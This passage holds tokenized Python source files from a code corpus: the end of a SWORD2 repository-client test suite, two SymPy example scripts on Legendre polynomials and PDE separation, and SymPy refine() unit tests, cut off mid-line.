sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> receipt = conn . get_deposit_receipt ( receipt . 
location ) <EOL> with open ( PACKAGE ) as pkg : <EOL> new_receipt = conn . add_file_to_resource ( receipt . edit_media , pkg , "<STR_LIT>" , <EOL> mimetype = PACKAGE_MIME , <EOL> metadata_relevant = True ) <EOL> assert new_receipt . code >= <NUM_LIT:200> and new_receipt . code < <NUM_LIT> <EOL> assert new_receipt . location is not None <EOL> assert new_receipt . location != receipt . edit_media <EOL> def test_25_basic_add_content_to_resource_package ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> with open ( PACKAGE ) as pkg : <EOL> new_receipt = conn . add_file_to_resource ( receipt . edit_media , pkg , "<STR_LIT>" , <EOL> mimetype = PACKAGE_MIME , <EOL> packaging = "<STR_LIT>" ) <EOL> assert new_receipt . code >= <NUM_LIT:200> and new_receipt . code < <NUM_LIT> <EOL> assert new_receipt . location is not None <EOL> assert new_receipt . location == receipt . edit_media <EOL> def test_26_advanced_add_content_to_resource_package ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , on_behalf_of = SSS_OBO ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> with open ( PACKAGE ) as pkg : <EOL> new_receipt = conn . add_file_to_resource ( receipt . 
edit_media , pkg , "<STR_LIT>" , <EOL> mimetype = PACKAGE_MIME , <EOL> packaging = "<STR_LIT>" , <EOL> metadata_relevant = True ) <EOL> assert new_receipt . code >= <NUM_LIT:200> and new_receipt . code < <NUM_LIT> <EOL> assert new_receipt . location is not None <EOL> assert new_receipt . location == receipt . edit_media <EOL> def test_27_basic_add_metadata ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> e = Entry ( title = "<STR_LIT>" , id = "<STR_LIT>" , dcterms_abstract = "<STR_LIT>" , dcterms_identifier = "<STR_LIT>" ) <EOL> receipt = conn . create ( col_iri = col . href , <EOL> metadata_entry = e <EOL> ) <EOL> receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> ne = Entry ( title = "<STR_LIT>" , id = "<STR_LIT>" , dcterms_identifier = "<STR_LIT>" , <EOL> dcterms_creator = "<STR_LIT>" , dcterms_rights = "<STR_LIT>" ) <EOL> new_receipt = conn . append ( dr = receipt , metadata_entry = ne ) <EOL> assert new_receipt . code == <NUM_LIT:200> <EOL> def test_28_advanced_add_metadata ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , on_behalf_of = SSS_OBO ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> e = Entry ( title = "<STR_LIT>" , id = "<STR_LIT>" , dcterms_abstract = "<STR_LIT>" , dcterms_identifier = "<STR_LIT>" ) <EOL> receipt = conn . create ( col_iri = col . href , <EOL> metadata_entry = e <EOL> ) <EOL> receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> ne = Entry ( title = "<STR_LIT>" , id = "<STR_LIT>" , dcterms_identifier = "<STR_LIT>" , <EOL> dcterms_creator = "<STR_LIT>" , dcterms_rights = "<STR_LIT>" ) <EOL> new_receipt = conn . append ( dr = receipt , metadata_entry = ne , in_progress = True ) <EOL> assert new_receipt . 
code == <NUM_LIT:200> <EOL> """<STR_LIT>""" <EOL> def test_31_delete_container ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , on_behalf_of = SSS_OBO , <EOL> error_response_raises_exceptions = False ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> edit_iri = receipt . location <EOL> receipt = conn . get_deposit_receipt ( edit_iri ) <EOL> new_receipt = conn . delete_container ( dr = receipt ) <EOL> assert new_receipt . code == <NUM_LIT> <EOL> assert new_receipt . dom is None <EOL> another_receipt = conn . get_deposit_receipt ( edit_iri ) <EOL> def test_32_get_atom_statement ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , on_behalf_of = SSS_OBO ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> edit_iri = receipt . location <EOL> receipt = conn . get_deposit_receipt ( edit_iri ) <EOL> assert receipt . atom_statement_iri is not None <EOL> statement = conn . get_atom_sword_statement ( receipt . atom_statement_iri ) <EOL> assert isinstance ( statement , Atom_Sword_Statement ) <EOL> def test_33_get_ore_statement ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , on_behalf_of = SSS_OBO ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . 
href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> edit_iri = receipt . location <EOL> receipt = conn . get_deposit_receipt ( edit_iri ) <EOL> assert receipt . ore_statement_iri is not None <EOL> statement = conn . get_ore_sword_statement ( receipt . ore_statement_iri ) <EOL> assert isinstance ( statement , Ore_Sword_Statement ) <EOL> def test_34_complete_deposit ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , on_behalf_of = SSS_OBO ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' , <EOL> in_progress = True , <EOL> suggested_identifier = "<STR_LIT>" ) <EOL> edit_iri = receipt . location <EOL> receipt = conn . get_deposit_receipt ( edit_iri ) <EOL> response = conn . complete_deposit ( dr = receipt ) <EOL> assert response . code == <NUM_LIT:200> <EOL> def test_35_error_checksum_mismatch ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , <EOL> error_response_raises_exceptions = False ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' , <EOL> in_progress = True , <EOL> suggested_identifier = "<STR_LIT>" , <EOL> md5sum = "<STR_LIT>" ) <EOL> assert receipt . code == <NUM_LIT> <EOL> assert isinstance ( receipt , Error_Document ) <EOL> assert receipt . 
error_href == "<STR_LIT>" <EOL> def test_36_error_bad_request ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , <EOL> error_response_raises_exceptions = False ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' , <EOL> in_progress = "<STR_LIT>" , <EOL> suggested_identifier = "<STR_LIT>" ) <EOL> assert receipt . code == <NUM_LIT> <EOL> assert isinstance ( receipt , Error_Document ) <EOL> assert receipt . error_href == "<STR_LIT>" <EOL> def test_37_error_target_owner_unknown ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , <EOL> error_response_raises_exceptions = False ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' , <EOL> in_progress = True , <EOL> suggested_identifier = "<STR_LIT>" , <EOL> on_behalf_of = "<STR_LIT>" ) <EOL> assert receipt . code == <NUM_LIT> <EOL> assert isinstance ( receipt , Error_Document ) <EOL> assert receipt . error_href == "<STR_LIT>" <EOL> def test_38_error_mediation_not_allowed ( self ) : <EOL> pass <EOL> def test_39_error_method_not_allowed ( self ) : <EOL> pass <EOL> def test_40_error_max_upload_size_exceeded ( self ) : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> from sympy . external import import_module <EOL> np = import_module ( '<STR_LIT>' ) <EOL> if not np : <EOL> sys . exit ( "<STR_LIT>" ) <EOL> plt = import_module ( '<STR_LIT>' ) <EOL> if not plt : <EOL> sys . exit ( "<STR_LIT>" ) <EOL> import mpmath <EOL> from sympy . utilities . autowrap import ufuncify <EOL> from sympy . utilities . lambdify import implemented_function <EOL> from sympy import symbols , legendre , pprint <EOL> def main ( ) : <EOL> print ( __doc__ ) <EOL> x = symbols ( '<STR_LIT:x>' ) <EOL> grid = np . linspace ( - <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1000> ) <EOL> mpmath . mp . dps = <NUM_LIT:20> <EOL> print ( "<STR_LIT>" ) <EOL> for n in range ( <NUM_LIT:6> ) : <EOL> expr = legendre ( n , x ) <EOL> print ( "<STR_LIT>" % n ) <EOL> pprint ( expr ) <EOL> binary_poly = ufuncify ( x , expr ) <EOL> polyvector = binary_poly ( grid ) <EOL> maxdiff = <NUM_LIT:0> <EOL> for j in range ( len ( grid ) ) : <EOL> precise_val = mpmath . legendre ( n , grid [ j ] ) <EOL> diff = abs ( polyvector [ j ] - precise_val ) <EOL> if diff > maxdiff : <EOL> maxdiff = diff <EOL> print ( "<STR_LIT>" % maxdiff ) <EOL> assert maxdiff < <NUM_LIT> <EOL> plot1 = plt . pyplot . plot ( grid , polyvector , hold = True ) <EOL> print ( "<STR_LIT>" ) <EOL> plt . pyplot . show ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> from sympy import symbols , Eq , Function , pde_separate , pprint , sin , cos , latex <EOL> from sympy import Derivative as D <EOL> def main ( ) : <EOL> r , phi , theta = symbols ( "<STR_LIT>" ) <EOL> Xi = Function ( '<STR_LIT>' ) <EOL> R , Phi , Theta , u = map ( Function , [ '<STR_LIT:R>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:u>' ] ) <EOL> C1 , C2 = symbols ( '<STR_LIT>' ) <EOL> pprint ( "<STR_LIT>" ) <EOL> pprint ( "<STR_LIT>" ) <EOL> eq = Eq ( D ( Xi ( r , phi , theta ) , r , <NUM_LIT:2> ) + <NUM_LIT:2> / r * D ( Xi ( r , phi , theta ) , r ) + <EOL> <NUM_LIT:1> / ( r ** <NUM_LIT:2> * sin ( phi ) ** <NUM_LIT:2> ) * D ( Xi ( r , phi , theta ) , theta , <NUM_LIT:2> ) + <EOL> cos ( phi ) / ( r ** <NUM_LIT:2> * sin ( phi ) ) * D ( Xi ( r , phi , theta ) , phi ) + <EOL> <NUM_LIT:1> / r ** <NUM_LIT:2> * D ( Xi ( r , phi , theta ) , phi , <NUM_LIT:2> ) ) <EOL> pprint ( eq ) <EOL> pprint ( "<STR_LIT>" ) <EOL> res_r = pde_separate ( eq , Xi ( r , phi , theta ) , [ R ( r ) , u ( phi , theta ) ] ) <EOL> pprint ( res_r ) <EOL> pprint ( "<STR_LIT>" ) <EOL> res_theta = pde_separate ( eq , Xi ( r , phi , theta ) , [ Theta ( theta ) , u ( r , phi ) ] ) <EOL> pprint ( res_theta ) <EOL> res_phi = pde_separate ( eq , Xi ( r , phi , theta ) , [ Phi ( phi ) , u ( r , theta ) ] ) <EOL> pprint ( "<STR_LIT>" ) <EOL> pprint ( "<STR_LIT>" % res_phi ) <EOL> pprint ( "<STR_LIT>" ) <EOL> eq_theta = Eq ( res_theta [ <NUM_LIT:0> ] , - C1 ) <EOL> pprint ( eq_theta ) <EOL> pprint ( "<STR_LIT>" ) <EOL> eq_left = Eq ( res_theta [ <NUM_LIT:1> ] , - C1 ) <EOL> pprint ( eq_left ) <EOL> pprint ( "<STR_LIT>" ) <EOL> res_theta = pde_separate ( eq_left , u ( r , phi ) , [ Phi ( phi ) , R ( r ) ] ) <EOL> pprint ( "<STR_LIT>" ) <EOL> pprint ( res_theta ) <EOL> pprint ( "<STR_LIT>" ) <EOL> pprint ( eq_theta ) <EOL> pprint ( Eq ( res_theta [ <NUM_LIT:0> ] , C2 ) ) <EOL> pprint ( Eq ( res_theta [ <NUM_LIT:1> ] , C2 ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> from sympy import ( Abs , exp , Expr , I , pi , Q , Rational , refine , S , sqrt , <EOL> atan , atan2 , nan , Symbol ) <EOL> from sympy . abc import x , y , z <EOL> from sympy . core . relational import Eq , Ne <EOL> from sympy . functions . elementary . piecewise import Piecewise <EOL> def test_Abs ( ) : <EOL> assert refine ( Abs ( x ) , Q . positive ( x ) ) == x <EOL> assert refine ( <NUM_LIT:1> + Abs ( x ) , Q . positive ( x ) ) == <NUM_LIT:1> + x <EOL> assert refine ( Abs ( x ) , Q . negative ( x ) ) == - x <EOL> assert refine ( <NUM_LIT:1> + Abs ( x ) , Q . negative ( x ) ) == <NUM_LIT:1> - x <EOL> assert refine ( Abs ( x ** <NUM_LIT:2> ) ) != x ** <NUM_LIT:2> <EOL> assert refine ( Abs ( x ** <NUM_LIT:2> ) , Q . real ( x ) ) == x ** <NUM_LIT:2> <EOL> def test_pow ( ) : <EOL> assert refine ( ( - <NUM_LIT:1> ) ** x , Q . even ( x ) ) == <NUM_LIT:1> <EOL> assert refine ( ( - <NUM_LIT:1> ) ** x , Q . odd ( x ) ) == - <NUM_LIT:1> <EOL> assert refine ( ( - <NUM_LIT:2> ) ** x , Q . even ( x ) ) == <NUM_LIT:2> ** x <EOL> assert refine ( sqrt ( x ** <NUM_LIT:2> ) ) != Abs ( x ) <EOL> assert refine ( sqrt ( x ** <NUM_LIT:2> ) , Q . complex ( x ) ) != Abs ( x ) <EOL> assert refine ( sqrt ( x ** <NUM_LIT:2> ) , Q . real ( x ) ) == Abs ( x ) <EOL> assert refine ( sqrt ( x ** <NUM_LIT:2> ) , Q . positive ( x ) ) == x <EOL> assert refine ( ( x ** <NUM_LIT:3> ) ** ( S ( <NUM_LIT:1> ) / <NUM_LIT:3> ) ) != x <EOL> assert refine ( ( x ** <NUM_LIT:3> ) ** ( S ( <NUM_LIT:1> ) / <NUM_LIT:3> ) , Q . real ( x ) ) != x <EOL> assert refine ( ( x ** <NUM_LIT:3> ) ** ( S ( <NUM_LIT:1> ) / <NUM_LIT:3> ) , Q . positive ( x ) ) == x <EOL> assert refine ( sqrt ( <NUM_LIT:1> / x ) , Q . real ( x ) ) != <NUM_LIT:1> / sqrt ( x ) <EOL> assert refine ( sqrt ( <NUM_LIT:1> / x ) , Q . positive ( x ) ) == <NUM_LIT:1> / sqrt ( x ) <EOL> assert refine ( ( - <NUM_LIT:1> ) ** ( x + y ) , Q . even ( x ) ) == ( - <NUM_LIT:1> ) ** y <EOL> assert refine ( ( - <NUM_LIT:1> ) ** ( x + y + z ) , Q . 
odd ( x ) & Q . odd ( z ) ) == ( - <NUM_LIT:1> ) ** y <EOL> assert refine ( ( - <NUM_LIT:1> ) ** ( x + y + <NUM_LIT:1> ) , Q . odd ( x ) ) == ( - <NUM_LIT:1> ) ** y <EOL> assert refine ( ( - <NUM_LIT:1> ) ** ( x + y + <NUM_LIT:2> ) , Q . odd ( x ) ) == ( - <NUM_LIT:1> ) ** ( y + <NUM_LIT:1> ) <EOL> assert refine ( ( - <NUM_LIT:1> ) ** ( x + <NUM_LIT:3> ) ) == ( - <NUM_LIT:1> ) ** ( x + <NUM_LIT:1> ) <EOL> assert refine ( ( - <NUM_LIT:1> ) ** ( ( - <NUM_LIT:1> ) ** x / <NUM_LIT:2> - S . Half ) , Q . integer ( x ) ) == ( - <NUM_LIT:1> ) ** x <EOL> assert refine ( ( - <NUM_LIT:1> ) ** ( ( - <NUM_LIT:1> ) ** x / <NUM_LIT:2> + S . Half ) , Q . integer ( x ) ) == ( - <NUM_LIT:1> ) ** ( x + <NUM_LIT:1> ) <EOL> assert refine ( ( - <NUM_LIT:1> ) ** ( ( - <NUM_LIT:1> ) ** x / <NUM_LIT:2> + <NUM_LIT:5> * S . Half ) , Q . integer ( x ) ) == ( - <NUM_LIT:1> ) ** ( x + <NUM_LIT:1> ) <EOL> assert refine ( ( - <NUM_LIT:1> ) ** ( ( - <NUM_LIT:1> ) ** x / <NUM_LIT:2> - <NUM_LIT:7> * S . Half ) , Q . integer ( x ) ) == ( - <NUM_LIT:1> ) ** ( x + <NUM_LIT:1> ) <EOL> assert refine ( ( - <NUM_LIT:1> ) ** ( ( - <NUM_LIT:1> ) ** x / <NUM_LIT:2> - <NUM_LIT:9> * S . Half ) , Q . integer ( x ) ) == ( - <NUM_LIT:1> ) ** x <EOL> assert refine ( Abs ( x ) ** <NUM_LIT:2> , Q . real ( x ) ) == x ** <NUM_LIT:2> <EOL> assert refine ( Abs ( x ) ** <NUM_LIT:3> , Q . 
real ( x ) ) == Abs ( x ) ** <NUM_LIT:3> <EOL> assert refine ( Abs ( x ) ** <NUM_LIT:2> ) == Abs ( x ) ** <NUM_LIT:2> <EOL> def test_exp ( ) : <EOL> x = Symbol ( '<STR_LIT:x>' , integer = True ) <EOL> assert refine ( exp ( pi * I * <NUM_LIT:2> * x ) ) == <NUM_LIT:1> <EOL> assert refine ( exp ( pi * I * <NUM_LIT:2> * ( x + Rational ( <NUM_LIT:1> , <NUM_LIT:2> ) ) ) ) == - <NUM_LIT:1> <EOL> assert refine ( exp ( pi * I * <NUM_LIT:2> * ( x + Rational ( <NUM_LIT:1> , <NUM_LIT:4> ) ) ) ) == I <EOL> assert refine ( exp ( pi * I * <NUM_LIT:2> * ( x + Rational ( <NUM_LIT:3> , <NUM_LIT:4> ) ) ) ) == - I <EOL> def test_Relational ( ) : <EOL> assert not refine ( x < <NUM_LIT:0> , ~ Q . is_true ( x < <NUM_LIT:0> ) ) <EOL> assert refine ( x < <NUM_LIT:0> , Q . is_true ( x < <NUM_LIT:0> ) ) <EOL> assert refine ( x < <NUM_LIT:0> , Q . is_true ( <NUM_LIT:0> > x ) ) == True <EOL> assert refine ( x < <NUM_LIT:0> , Q . is_true ( y < <NUM_LIT:0> ) ) == ( x < <NUM_LIT:0> ) <EOL> assert not refine ( x <= <NUM_LIT:0> , ~ Q . is_true ( x <= <NUM_LIT:0> ) ) <EOL> assert refine ( x <= <NUM_LIT:0> , Q . is_true ( x <= <NUM_LIT:0> ) ) <EOL> assert refine ( x <= <NUM_LIT:0> , Q . is_true ( <NUM_LIT:0> >= x ) ) == True <EOL> assert refine ( x <= <NUM_LIT:0> , Q . is_true ( y <= <NUM_LIT:0> ) ) == ( x <= <NUM_LIT:0> ) <EOL> assert not refine ( x > <NUM_LIT:0> , ~ Q . is_true ( x > <NUM_LIT:0> ) ) <EOL> assert refine ( x > <NUM_LIT:0> , Q . is_true ( x > <NUM_LIT:0> ) ) <EOL> assert refine ( x > <NUM_LIT:0> , Q . is_true ( <NUM_LIT:0> < x ) ) == True <EOL> assert refine ( x > <NUM_LIT:0> , Q . is_true ( y > <NUM_LIT:0> ) ) == ( x > <NUM_LIT:0> ) <EOL> assert not refine ( x >= <NUM_LIT:0> , ~ Q . is_true ( x >= <NUM_LIT:0> ) ) <EOL> assert refine ( x >= <NUM_LIT:0> , Q . is_true ( x >= <NUM_LIT:0> ) ) <EOL> assert refine ( x >= <NUM_LIT:0> , Q . is_true ( <NUM_LIT:0> <= x ) ) == True <EOL> assert refine ( x >= <NUM_LIT:0> , Q . 
is_true ( y >= <NUM_LIT:0> ) ) == ( x >= <NUM_LIT:0> ) <EOL> assert not refine ( Eq ( x , <NUM_LIT:0> ) , ~ Q . is_true ( Eq ( x , <NUM_LIT:0> ) ) ) <EOL> assert refine ( Eq ( x , <NUM_LIT:0> ) , Q . is_true ( Eq ( x , <NUM_LIT:0> ) ) ) <EOL> assert refine ( Eq ( x , <NUM_LIT:0> ) , Q . is_true ( Eq ( <NUM_LIT:0> , x ) ) ) == True <EOL> assert refine ( Eq ( x , <NUM_LIT:0> ) , Q . is_true ( Eq ( y , <NUM_LIT:0> ) ) ) == Eq ( x , <NUM_LIT:0> ) <EOL> assert not refine ( Ne ( x , <NUM_LIT:0> ) , ~ Q . is_true ( Ne ( x , <NUM_LIT:0> ) ) ) <EOL> assert refine ( Ne ( x , <NUM_LIT:0> ) , Q . is_true ( Ne ( <NUM_LIT:0> , x ) ) ) == True <EOL> assert refine ( Ne ( x , <NUM_LIT:0> ) , Q . is_true ( Ne ( x , <NUM_LIT:0> ) ) ) <EOL> assert refine ( Ne ( x , <NUM_LIT:0> ) , Q . is_true ( Ne ( y , <NUM_LIT:0> ) ) ) == ( Ne ( x , <NUM_LIT:0> ) ) <EOL> def test_Piecewise ( ) : <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , x < <NUM_LIT:0> ) , ( <NUM_LIT:3> , True ) ) , Q . is_true ( x < <NUM_LIT:0> ) ) == <NUM_LIT:1> <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , x < <NUM_LIT:0> ) , ( <NUM_LIT:3> , True ) ) , ~ Q . is_true ( x < <NUM_LIT:0> ) ) == <NUM_LIT:3> <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , x < <NUM_LIT:0> ) , ( <NUM_LIT:3> , True ) ) , Q . is_true ( y < <NUM_LIT:0> ) ) == Piecewise ( ( <NUM_LIT:1> , x < <NUM_LIT:0> ) , ( <NUM_LIT:3> , True ) ) <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , x > <NUM_LIT:0> ) , ( <NUM_LIT:3> , True ) ) , Q . is_true ( x > <NUM_LIT:0> ) ) == <NUM_LIT:1> <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , x > <NUM_LIT:0> ) , ( <NUM_LIT:3> , True ) ) , ~ Q . is_true ( x > <NUM_LIT:0> ) ) == <NUM_LIT:3> <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , x > <NUM_LIT:0> ) , ( <NUM_LIT:3> , True ) ) , Q . is_true ( y > <NUM_LIT:0> ) ) == Piecewise ( ( <NUM_LIT:1> , x > <NUM_LIT:0> ) , ( <NUM_LIT:3> , True ) ) <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , x <= <NUM_LIT:0> ) , ( <NUM_LIT:3> , True ) ) , Q . 
is_true ( x <= <NUM_LIT:0> ) ) == <NUM_LIT:1> <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , x <= <NUM_LIT:0> ) , ( <NUM_LIT:3> , True ) ) , ~ Q . is_true ( x <= <NUM_LIT:0> ) ) == <NUM_LIT:3> <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , x <= <NUM_LIT:0> ) , ( <NUM_LIT:3> , True ) ) , Q . is_true ( y <= <NUM_LIT:0> ) ) == Piecewise ( ( <NUM_LIT:1> , x <= <NUM_LIT:0> ) , ( <NUM_LIT:3> , True ) ) <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , x >= <NUM_LIT:0> ) , ( <NUM_LIT:3> , True ) ) , Q . is_true ( x >= <NUM_LIT:0> ) ) == <NUM_LIT:1> <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , x >= <NUM_LIT:0> ) , ( <NUM_LIT:3> , True ) ) , ~ Q . is_true ( x >= <NUM_LIT:0> ) ) == <NUM_LIT:3> <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , x >= <NUM_LIT:0> ) , ( <NUM_LIT:3> , True ) ) , Q . is_true ( y >= <NUM_LIT:0> ) ) == Piecewise ( ( <NUM_LIT:1> , x >= <NUM_LIT:0> ) , ( <NUM_LIT:3> , True ) ) <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , Eq ( x , <NUM_LIT:0> ) ) , ( <NUM_LIT:3> , True ) ) , Q . is_true ( Eq ( x , <NUM_LIT:0> ) ) ) == <NUM_LIT:1> <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , Eq ( x , <NUM_LIT:0> ) ) , ( <NUM_LIT:3> , True ) ) , Q . is_true ( Eq ( <NUM_LIT:0> , x ) ) ) == <NUM_LIT:1> <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , Eq ( x , <NUM_LIT:0> ) ) , ( <NUM_LIT:3> , True ) ) , ~ Q . is_true ( Eq ( x , <NUM_LIT:0> ) ) ) == <NUM_LIT:3> <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , Eq ( x , <NUM_LIT:0> ) ) , ( <NUM_LIT:3> , True ) ) , ~ Q . is_true ( Eq ( <NUM_LIT:0> , x ) ) ) == <NUM_LIT:3> <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , Eq ( x , <NUM_LIT:0> ) ) , ( <NUM_LIT:3> , True ) ) , Q . is_true ( Eq ( y , <NUM_LIT:0> ) ) ) == Piecewise ( ( <NUM_LIT:1> , Eq ( x , <NUM_LIT:0> ) ) , ( <NUM_LIT:3> , True ) ) <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , Ne ( x , <NUM_LIT:0> ) ) , ( <NUM_LIT:3> , True ) ) , Q . 
is_true ( Ne ( x , <NUM_LIT:0> ) ) ) == <NUM_LIT:1> <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , Ne ( x , <NUM_LIT:0> ) ) , ( <NUM_LIT:3> , True ) ) , ~ Q . is_true ( Ne ( x , <NUM_LIT:0> ) ) ) == <NUM_LIT:3> <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , Ne ( x , <NUM_LIT:0> ) ) , ( <NUM_LIT:3> , True ) ) , Q . is_true ( Ne ( y , <NUM_LIT:0> ) ) ) == Piecewise ( ( <NUM_LIT:1> , Ne ( x , <NUM_LIT:0> ) ) , ( <NUM_LIT:3> , True ) ) <EOL> def test_atan2 ( ) : <EOL> assert refine ( atan2 ( y , x ) , Q . real ( y ) & Q . positive ( x ) ) == atan ( y / x ) <EOL> assert refine ( atan2 ( y , x ) , Q . negative ( y ) & Q . positive ( x ) ) == atan ( y / x ) <EOL> assert refine ( atan2 ( y , x ) , Q . negative ( y ) & Q . negative ( x ) ) == atan ( y / x ) - pi <EOL> assert refine ( atan2 ( y , x ) , Q . positive ( y ) & Q . negative ( x ) ) == atan ( y / x ) + pi <EOL> assert refine ( atan2 ( y , x ) , Q . zero ( y ) & Q . negative ( x ) ) == pi <EOL> assert refine ( atan2 ( y , x ) , Q . positive ( y ) & Q . zero ( x ) ) == pi / <NUM_LIT:2> <EOL> assert refine ( atan2 ( y , x ) , Q . negative ( y ) & Q . zero ( x ) ) == - pi / <NUM_LIT:2> <EOL> assert refine ( atan2 ( y , x ) , Q . zero ( y ) & Q . zero ( x ) ) == nan <EOL> def test_func_args ( ) : <EOL> class MyClass ( Expr ) : <EOL> def __init__ ( self , * args ) : <EOL> self . my_member = "<STR_LIT>" <EOL> @ property <EOL> def func ( self ) : <EOL> def my_func ( * args ) : <EOL> obj = MyClass ( * args ) <EOL> obj . my_member = self . my_member <EOL> return obj <EOL> return my_func <EOL> x = MyClass ( ) <EOL> x . my_member = "<STR_LIT>" <EOL> assert x 